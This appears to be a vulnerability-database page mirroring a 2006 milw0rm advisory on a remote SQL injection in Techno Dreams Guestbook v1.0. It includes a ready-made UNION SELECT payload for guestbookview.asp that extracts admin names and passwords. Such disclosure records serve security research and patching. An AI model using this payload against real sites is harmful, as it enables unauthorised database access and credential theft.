header-logo
Suggest Exploit
vendor:
Techno Dreams Guestbook
by:
ajann
9,3
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Techno Dreams Guestbook
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: YES
Related CWE: N/A
CPE: cpe:a:t-dreams:techno_dreams_guestbook:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability

Techno Dreams Guestbook v1.0 suffers from a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of Techno Dreams Guestbook.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author :   ajann
# Script Page: http://www.t-dreams.com

*******************************************************************************

###http://[target]/[path]/guestbookview.asp?key=[  SQL ]

Example:

//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-10-30]

Navigation

Suggest Exploit

Services By CQR